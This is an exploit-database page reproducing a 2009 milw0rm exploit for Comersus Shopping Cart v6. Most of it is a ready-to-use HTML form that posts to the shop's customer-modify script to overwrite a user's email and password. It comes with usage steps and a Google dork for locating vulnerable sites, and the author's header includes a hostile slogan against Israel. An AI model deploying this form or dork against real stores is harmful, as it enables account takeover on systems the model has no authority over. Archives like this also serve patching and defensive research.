Comersus Shopping Cart - exploit.company

vendor:

Comersus Shopping Cart

by:

ajann

7.5

CVSS

HIGH

Remote User Pass Exploit

CWE

Product Name: Comersus Shopping Cart

Affected Version From: v6

Affected Version To: v6

Patch Exists: Yes

Related CWE: N/A

CPE: a:comersus:comersus_shopping_cart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Comersus Shopping Cart <= v6 Remote User Pass Exploit

This exploit allows an attacker to modify the user email and password of a Comersus Shopping Cart version 6 or lower. The attacker can access the vulnerable page by registering on the site and logging in. The exploit is then triggered by submitting a form with the modified user email and password.

Mitigation:

Upgrade to the latest version of Comersus Shopping Cart.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.comersus.com/
# $$      :  Free
# Dork    :  Powered by Comersus v6 Shopping Cart
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
  <table width="421" border="0">  
      <tr> 
      
    </tr>
    <tr> 
      <td width="168">Name</td>
      <td width="220">      
        <input type=text name=customerName value="test">
      </td>
    </tr>    
    <tr> 
      <td width="168">Last Name</td>
      <td width="220">      
        <input type=text name=lastName value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Company</td>
      <td width="220">      
        <input type=text name=customerCompany value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Phone</td>
      <td width="220">        
       <input type=text name=phone value="123456789">
      </td>
    </tr>
    <tr> 
      <td width="168"><strong>Email</strong></td>
      <td width="220">   
    
        <input type="text" name="email" value="Please Add Mail"> 
        Edit
      </td>
    </tr>
    <tr> 
      <td width="168"><strong>Password</strong></td>
      <td width="220">         
        <input type=text name=password value="Please Add Pass"> 
        Edit
      </td>
    </tr>
    <tr> 
      <td width="168">Address</td>
      <td width="220">         
        <input type=text name=address value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Zip</td>
      <td width="220">         
        <input type=text name=zip value="08050">
      </td>
    </tr>
    <tr> 
      <td width="168">State</td>
      <td width="220">         
        
      <SELECT name=stateCode size=1>
      <OPTION value="">Select the state
        <option value="1">Please Type County below
      </OPTION>
      </SELECT>
      </td>
    </tr>
    <tr> 
      <td width="168">Non listed state</td>
      <td width="220">         
       <input type=text name=state value="">
      </td>
    </tr>
    <tr> 
      <td width="168">City</td>
      <td width="220">         
        <input type=text name=city value="test">
      </td>
    </tr>    
    <tr> 
      <td width="168">Country</td>
      <td width="220">                 
        
      <SELECT name=countryCode>
      <OPTION value="">Select the country
        <option value="AF" selected>AFGHANISTAN
      </OPTION>
      </SELECT>       
      </td>
    </tr>
    
    
    
    <tr> 
      <td width="168">&nbsp;</td>
      <td width="220">&nbsp;</td>
    </tr>
    <tr> 
      <td colspan="2">        
          <input type="submit" name="Modify" value="Modify">                            
      </td>
    </tr>
    </table>
   </form>          

# milw0rm.com [2009-01-12]